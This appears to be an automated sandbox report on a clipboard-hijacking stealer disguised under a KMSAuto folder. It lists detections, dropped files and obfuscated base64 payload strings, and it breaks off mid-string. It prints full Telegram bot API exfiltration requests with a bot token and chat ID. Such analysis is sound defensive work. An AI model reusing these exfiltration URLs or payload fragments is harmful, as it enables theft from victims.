Click to jump to signature section
Source: C:\ProgramData\KMSAuto\accc.exe | Avira: detection malicious, Label: TR/Dropper.Gen |
Source: nobtpajdjthawd.exe | ReversingLabs: Detection: 81% |
Source: nobtpajdjthawd.exe | Virustotal: Detection: 72% | Perma Link |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49718 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49724 version: TLS 1.2 |
Source: nobtpajdjthawd.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Source: | Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb source: nobtpajdjthawd.exe, accc.exe.1.dr |
Source: | Binary string: System.Windows.Forms.pdbac source: WER6131.tmp.dmp.25.dr |
Source: | Binary string: System.Windows.Forms.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr |
Source: | Binary string: Portals.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr |
Source: | Binary string: costura.dotnetzip.pdb.compressed source: nobtpajdjthawd.exe, 00000000.00000002.1277019771.00000000041E9000.00000004.00000800.00020000.00000000.sdmp, nobtpajdjthawd.exe, 00000001.00000002.1309844260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, accc.exe, 0000000E.00000002.1417102381.0000000003449000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000014.00000002.1364848533.0000000003247000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000014.00000002.1364848533.0000000003251000.00000004.00000800.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr |
Source: | Binary string: System.ni.pdbRSDS source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr |
Source: | Binary string: Portals.pdb@\ source: WER5E53.tmp.dmp.23.dr |
Source: | Binary string: mscorlib.ni.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr |
Source: | Binary string: System.pdb) source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr |
Source: | Binary string: costura.dotnetzip.pdb.compressed|||DotNetZip.pdb|565BABCBCD978AF66FE1150CC58FDEAFC9815822|622080 source: nobtpajdjthawd.exe, 00000000.00000002.1277019771.00000000041E9000.00000004.00000800.00020000.00000000.sdmp, nobtpajdjthawd.exe, 00000001.00000002.1309844260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, accc.exe, 0000000E.00000002.1417102381.0000000003449000.00000004.00000800.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb<;V; H;_CorExeMainmscoree.dll source: nobtpajdjthawd.exe, accc.exe.1.dr |
Source: | Binary string: q costura.dotnetzip.pdb.compressedlB source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000013.00000002.3636637468.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000014.00000002.1364848533.0000000003251000.00000004.00000800.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.ni.pdbRSDS source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr |
Source: | Binary string: p.pdb.compressed source: accc.exe, 00000014.00000002.1364848533.0000000003251000.00000004.00000800.00020000.00000000.sdmp |
Source: | Binary string: costura.dotnetzip.pdb.compressed@\ source: accc.exe, 00000014.00000002.1364848533.0000000003251000.00000004.00000800.00020000.00000000.sdmp |
Source: | Binary string: System.ni.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr |
Source: | Binary string: System.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\tmp5337.tmp.bat | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\ | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\ | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\ | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\ | Jump to behavior |
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49724 -> 149.154.167.220:443 |
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49718 -> 149.154.167.220:443 |
Source: global traffic | HTTP traffic detected: GET /bot7326900034:AAGf6EZ3UM79PKfc6LWxCq-R0p2wwmA0Nyo/sendMessage?chat_id=8124584176&text=%F0%9F%A6%A0%201.0.0%0A%F0%9F%A4%96%20ID:%20%20%3Ccode%3E031912DB65A63CDAB5%3C/code%3E%0D%0A%F0%9F%91%A4%20User:%20%3Ccode%3Euser/932923%3C/code%3E%0D%0A%F0%9F%93%85%20%D0%94%D0%B0%D1%82%D0%B0%20%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B8/%D0%B7%D0%B0%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F:%20%3Ccode%3E11/03/2025%2016:50:55%3C/code%3E%0D%0A%E2%9A%99%EF%B8%8F%20%3Ccode%3EC:%5CUsers%5Cuser%5CDesktop%5Cnobtpajdjthawd.exe%3C/code%3E%0D%0A%E2%9A%96%EF%B8%8F%20%D0%92%D0%B5%D1%81%20%D0%B1%D0%B8%D0%BB%D0%B4%D0%B0%20%3Ccode%3E923%20KB%3C/code%3E%0D%0A%F0%9F%97%92%20%D0%9A%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%BD%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D1%8B%20%D0%B8%20%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D1%8B%20%D0%B2%20%D1%84%D0%B0%D0%B9%D0%BB%D0%B0:%20%0A%0D%0A%D0%9D%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D0%BD%D1%8B%D0%B5%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%B2%20%D0%B1%D1%83%D1%84%D0%B5%D1%80%D0%B5%20%D0%BE%D0%B1%D0%BC%D0%B5%D0%BD%D0%B0:%0D%0A%0A%0D%0A%D0%97%D0%B0%D0%BC%D0%B5%D0%BD%D0%B8%D0%BB%D0%B8%20%D0%BD%D0%B0%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8:%0D%0A%0A&parse_mode=html HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /bot7326900034:AAGf6EZ3UM79PKfc6LWxCq-R0p2wwmA0Nyo/sendMessage?chat_id=8124584176&text=%F0%9F%A6%A0%201.0.0%0A%F0%9F%A4%96%20ID:%20%20%3Ccode%3E031912DB65A63CDAB5%3C/code%3E%0D%0A%F0%9F%91%A4%20User:%20%3Ccode%3Euser/932923%3C/code%3E%0D%0A%F0%9F%93%85%20%D0%94%D0%B0%D1%82%D0%B0%20%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B8/%D0%B7%D0%B0%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F:%20%3Ccode%3E11/03/2025%2016:51:02%3C/code%3E%0D%0A%E2%9A%99%EF%B8%8F%20%3Ccode%3EC:%5CProgramData%5CKMSAuto%5Caccc.exe%3C/code%3E%0D%0A%E2%9A%96%EF%B8%8F%20%D0%92%D0%B5%D1%81%20%D0%B1%D0%B8%D0%BB%D0%B4%D0%B0%20%3Ccode%3E131%20MB%3C/code%3E%0D%0A%F0%9F%97%92%20%D0%9A%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%BD%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D1%8B%20%D0%B8%20%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D1%8B%20%D0%B2%20%D1%84%D0%B0%D0%B9%D0%BB%D0%B0:%20%0A%0D%0A%D0%9D%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D0%BD%D1%8B%D0%B5%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%B2%20%D0%B1%D1%83%D1%84%D0%B5%D1%80%D0%B5%20%D0%BE%D0%B1%D0%BC%D0%B5%D0%BD%D0%B0:%0D%0A%0A%0D%0A%D0%97%D0%B0%D0%BC%D0%B5%D0%BD%D0%B8%D0%BB%D0%B8%20%D0%BD%D0%B0%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8:%0D%0A%0A&parse_mode=html HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /bot7326900034:AAGf6EZ3UM79PKfc6LWxCq-R0p2wwmA0Nyo/sendMessage?chat_id=8124584176&text=%F0%9F%A6%A0%201.0.0%0A%F0%9F%A4%96%20ID:%20%20%3Ccode%3E031912DB65A63CDAB5%3C/code%3E%0D%0A%F0%9F%91%A4%20User:%20%3Ccode%3Euser/932923%3C/code%3E%0D%0A%F0%9F%93%85%20%D0%94%D0%B0%D1%82%D0%B0%20%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B8/%D0%B7%D0%B0%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F:%20%3Ccode%3E11/03/2025%2016:50:55%3C/code%3E%0D%0A%E2%9A%99%EF%B8%8F%20%3Ccode%3EC:%5CUsers%5Cuser%5CDesktop%5Cnobtpajdjthawd.exe%3C/code%3E%0D%0A%E2%9A%96%EF%B8%8F%20%D0%92%D0%B5%D1%81%20%D0%B1%D0%B8%D0%BB%D0%B4%D0%B0%20%3Ccode%3E923%20KB%3C/code%3E%0D%0A%F0%9F%97%92%20%D0%9A%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%BD%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D1%8B%20%D0%B8%20%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D1%8B%20%D0%B2%20%D1%84%D0%B0%D0%B9%D0%BB%D0%B0:%20%0A%0D%0A%D0%9D%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D0%BD%D1%8B%D0%B5%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%B2%20%D0%B1%D1%83%D1%84%D0%B5%D1%80%D0%B5%20%D0%BE%D0%B1%D0%BC%D0%B5%D0%BD%D0%B0:%0D%0A%0A%0D%0A%D0%97%D0%B0%D0%BC%D0%B5%D0%BD%D0%B8%D0%BB%D0%B8%20%D0%BD%D0%B0%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8:%0D%0A%0A&parse_mode=html HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /bot7326900034:AAGf6EZ3UM79PKfc6LWxCq-R0p2wwmA0Nyo/sendMessage?chat_id=8124584176&text=%F0%9F%A6%A0%201.0.0%0A%F0%9F%A4%96%20ID:%20%20%3Ccode%3E031912DB65A63CDAB5%3C/code%3E%0D%0A%F0%9F%91%A4%20User:%20%3Ccode%3Euser/932923%3C/code%3E%0D%0A%F0%9F%93%85%20%D0%94%D0%B0%D1%82%D0%B0%20%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B8/%D0%B7%D0%B0%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F:%20%3Ccode%3E11/03/2025%2016:51:02%3C/code%3E%0D%0A%E2%9A%99%EF%B8%8F%20%3Ccode%3EC:%5CProgramData%5CKMSAuto%5Caccc.exe%3C/code%3E%0D%0A%E2%9A%96%EF%B8%8F%20%D0%92%D0%B5%D1%81%20%D0%B1%D0%B8%D0%BB%D0%B4%D0%B0%20%3Ccode%3E131%20MB%3C/code%3E%0D%0A%F0%9F%97%92%20%D0%9A%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%BD%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D1%8B%20%D0%B8%20%D0%B7%D0%B0%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D1%8B%20%D0%B2%20%D1%84%D0%B0%D0%B9%D0%BB%D0%B0:%20%0A%0D%0A%D0%9D%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD%D0%BD%D1%8B%D0%B5%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8%20%D0%B2%20%D0%B1%D1%83%D1%84%D0%B5%D1%80%D0%B5%20%D0%BE%D0%B1%D0%BC%D0%B5%D0%BD%D0%B0:%0D%0A%0A%0D%0A%D0%97%D0%B0%D0%BC%D0%B5%D0%BD%D0%B8%D0%BB%D0%B8%20%D0%BD%D0%B0%20%D0%BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B8:%0D%0A%0A&parse_mode=html HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.000000000325F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org |
Source: accc.exe, 00000014.00000002.1359673420.0000000001596000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoft.c |
Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000013.00000002.3636637468.00000000033D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: Amcache.hve.4.dr | String found in binary or memory: http://upx.sf.net |
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml |
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com |
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers |
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/? |
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN |
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html |
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8 |
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers? |
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG |
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com |
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn |
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe |
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe |
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease |
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm |
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/ |
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com |
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com |
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com |
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD |
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease |
Source: accc.exe, 00000013.00000002.3663083249.0000000007742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn |
Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.000000000321C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.teleLR |
Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000003259000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org |
Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.000000000321C000.00000004.00000800.00020000.00000000.sdmp, nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000003211000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot |
Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.000000000324C000.00000004.00000800.00020000.00000000.sdmp, nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000003248000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7326900034:AAGf6EZ3UM79PKfc6LWxCq-R0p2wwmA0Nyo/sendMessage?chat_id=81245 |
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718 |
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49718 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49724 version: TLS 1.2 |
Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, wpOcuqWsqP.cs | Long String: Length: 12792 |
Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, wpOcuqWsqP.cs | Long String: Length: 29668 |
Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, wpOcuqWsqP.cs | Long String: Length: 12332 |
Source: 14.2.accc.exe.3449550.0.raw.unpack, wpOcuqWsqP.cs | Long String: Length: 12792 |
Source: 14.2.accc.exe.3449550.0.raw.unpack, wpOcuqWsqP.cs | Long String: Length: 29668 |
Source: 14.2.accc.exe.3449550.0.raw.unpack, wpOcuqWsqP.cs | Long String: Length: 12332 |
Source: C:\ProgramData\KMSAuto\accc.exe | Process Stats: CPU usage > 49% |
Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Code function: 0_2_01432630 | 0_2_01432630 |
Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Code function: 1_2_014A6740 | 1_2_014A6740 |
Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Code function: 1_2_014A4BB0 | 1_2_014A4BB0 |
Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Code function: 1_2_014A9778 | 1_2_014A9778 |
Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Code function: 1_2_014A7FD0 | 1_2_014A7FD0 |
Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Code function: 1_2_014A6731 | 1_2_014A6731 |
Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Code function: 1_2_014A4B9F | 1_2_014A4B9F |
Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Code function: 1_2_014A9768 | 1_2_014A9768 |
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 14_2_00A9253D | 14_2_00A9253D |
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 15_2_02802538 | 15_2_02802538 |
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 19_2_0191A590 | 19_2_0191A590 |
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 19_2_01914BB0 | 19_2_01914BB0 |
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 19_2_01914B9F | 19_2_01914B9F |
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 19_2_059119C4 | 19_2_059119C4 |
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 19_2_05912318 | 19_2_05912318 |
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 19_2_05912308 | 19_2_05912308 |
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 19_2_05913ED1 | 19_2_05913ED1 |
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 19_2_05911B70 | 19_2_05911B70 |
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 19_2_05A8C1E0 | 19_2_05A8C1E0 |
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 19_2_05A867F8 | 19_2_05A867F8 |
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 19_2_05A87DB7 | 19_2_05A87DB7 |
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 20_2_019D4BB0 | 20_2_019D4BB0 |
Source: C:\ProgramData\KMSAuto\accc.exe | Code function: 20_2_019D4B9F | 20_2_019D4B9F |
Source: C:\Users\user\Desktop\nobtpajdjthawd.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7292 -s 800 |
Source: nobtpajdjthawd.exe, 00000000.00000002.1277019771.00000000041E9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePortals.exe0 vs nobtpajdjthawd.exe |
Source: nobtpajdjthawd.exe, 00000000.00000002.1277019771.00000000041E9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameyandexbrowser_exe: vs nobtpajdjthawd.exe |
Source: nobtpajdjthawd.exe, 00000000.00000002.1275665949.000000000145E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs nobtpajdjthawd.exe |
Source: nobtpajdjthawd.exe, 00000000.00000000.1163505974.0000000000DC6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamePortals.exe0 vs nobtpajdjthawd.exe |
Source: nobtpajdjthawd.exe, 00000001.00000002.1309844260.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameyandexbrowser_exe: vs nobtpajdjthawd.exe |
Source: nobtpajdjthawd.exe | Binary or memory string: OriginalFilenamePortals.exe0 vs nobtpajdjthawd.exe |
Source: nobtpajdjthawd.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: accc.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: nobtpajdjthawd.exe | Static PE information: Section: .CSS ZLIB complexity 1.0003119425768385 |
Source: accc.exe.1.dr | Static PE information: Section: .CSS ZLIB complexity 1.0003119425768385 |
Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, WPJHIdWGZYOD.cs | Base64 encoded string: 'H4sIAAAAAAAEAItJijY0jo1O1K1y1PXw0vUL0I0y0LWMrTYy0zE2rY1JAgA/kBJeIAAAAA==', 'H4sIAAAAAAAEAItJ0khK1jDQiE5M1s3I0s0r0K0yMNK1jK02tqytwRA0tazVrDHEELbQsTCv1dSMSQIAmnZO4E4AAAA=', 'H4sIAAAAAAAEAItJMqiITtRNc9R1M9C1jK02MaiNSQIAq44emBUAAAA=', 'H4sIAAAAAAAEAItJijaxiI020LV0dIqNNgRSuh5eun4BulGJutm5ulWx1ZbGtTFJAKXtzMonAAAA', 'H4sIAAAAAAAEAItJco820LVM1K1y1I2KrTY1rY1JAgBrh5bZFAAAAA==', 'H4sIAAAAAAAEAItJKoouKijOyEtMM7Ysdwp18XN19/Dy9vE1CQgMCg4xDwuPiIwySkpOSXVONzPNys61yHcrzDQsKS1zrKisiq02MtExNqmNSQIAQVwclkgAAAA=', 'H4sIAAAAAAAEAItJcow20LVM1K1y1I2KrTY2ro1JAgCSkcF9FAAAAA==', 'H4sIAAAAAAAEAItJ0tBIyixJzs/MS04szrDStNcorCnQjE7UrTLQtYytNjGs1YxJAgBI3BA7JgAAAA==', 'H4sIAAAAAAAEAItJivbxjY1O1M3O1a1y1PXw0vUL0I0y1LWMrTYy0zE2ro1JAgBbyj43IwAAAA==', 'H4sIAAAAAAAEAItJcqk2rI021bV01PXw0vUL0A2NBQkYIgSiEnWzc3WrYquNjWpjkgArcHyrMQAAAA==', 'H4sIAAAAAAAEAItJiog21LV01PXw0vUL0I1K1M3O1a2KrTY2ro1JAgANsrq/HQAAAA==', 'H4sIAAAAAAAEAItJColO1K1y1I0y0LWMrTay0DE2ro1JAgCQuGQ4FwAAAA==', 'H4sIAAAAAAAEAItJKjGMNtC1dNStiq02Nq6NSQIA8OfYfRIAAAA=', 'H4sIAAAAAAAEAItJ0kjKS9LUiE7UrTLQtYytNras1YxJAgAS93gFFwAAAA==' |
Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, wpOcuqWsqP.cs | Base64 encoded string: 'H4sIAAAAAAAEADWb2bKsKpRFf6geLESBz6FoQ5qgB/n6WvuY9+nGie3N1NXMOaaa/yf+NyeeXpGuK6twMnMhh/st/F65HpLLtvG6Bar/839w6BLZGLrz5a5YjZri1YHLLnUOgr2uhe18I/8O9aWRzed+E7VSMszOcFn13LIuQ9Phr6S28v8ODdLHU8ukLxHWYS5ytWIaLim5sxca+3GEmf8demVvOEMidIaqpXFgd9krlkZNTheR1/T7Sv8OtUrhUBxOflVzFhTfKqrDyql2HPsYXdfAzb9DN7+sFpJzMe43cy+cdtS/OkZxWq0fnX0l9t+h2MpUbuacrs2wdg4mkrvVeBRzY5y0z9kJ+3coKv5As/e0ZGa5I07VonGKQsvt8ur9cdet/h061SNiqNq0123klFTvDYXDrjLSqzqYe0jc/w7VL+NoxWS53tOmiOzxIKi/SRqbgz8DSba/c+Xbib1Yz03Hxu9dipP6dbYwijacAd9prO9T2xGCfPKIARPXYhK27ZSXFbK3txzNRKTV14KJkmL3eAo1b6fRtRz7HdeVljck4WEiL+yrwNGSVm6UfZ1tIzZNCCU53RYyGekXBXt6R79ivbcnHnt0Lp+riJeTaqeVTfLUiqPzKNiY/w5VbLtuLtzPJ2FD9k3YijpTTxCM1/DDdG3lv0MfcZhxaR8X6sYiXxSuRioa7JOqS88dHsqef4cylnEvMl7nYwiUM4r7hEFQPiA++qbzejv+Lisr9ZY1xeKJkN54q0KPYp6zqz0OHfHxsvU1ttZwumwfLlYrayM1xxUx97Y8iG/PbR8hfxVQXC42YFSVQD107sOZHlsEEzubIt9KHpK+3XpeeS0yFtZPmC2b81qBpP48+RylixAfeeTjW8O51M21uXVlTKfL3Ae93sRluQ2BryKRW/YtzIp5O1WHvMd2D+dLyytxfBpBH5UGVlQpur7GrgnLsq/X6TQfgjC55ipXIh0+21bvr3wS/k3WDC7ZfLdTZxVzeI15ct2ct/xolJKBdYqfDhDWptsG16uOA1tqJEx7wn6kcQ5EV6Y0u28GHiIQf/AJ6x+mhoVc3l6Fs1VUDJbanXPGXwXciQdfzx5vRdoOPt01K7Q1EKX6eU1qjLm/T53edHok/yqfWz/Cc1124cQMgcGcfd+qCRG/cTEwO1z761S5Ru1bskvt84SxyI2qfKHpbvd9qhECp/Y4wjF7Payte6+pklx9k/M2l++t4N8MiFpeYdziOez3tRfO/CgtJKHDNV+qosBfsbDs8Ne1X2I8kf4+A5ItXisVIeQd06XNCudX163jUl2e6SVspKDPdhMSSvP62ieLQTzx/ooFw3lPWDeTKANF5stgcSn4e4OrSUfbO+GfaKrjwGZNlhqhpOXqJOUyUHRodh879IFc1N8aMih3tzF7CSp16YDvFEARKL3XbQV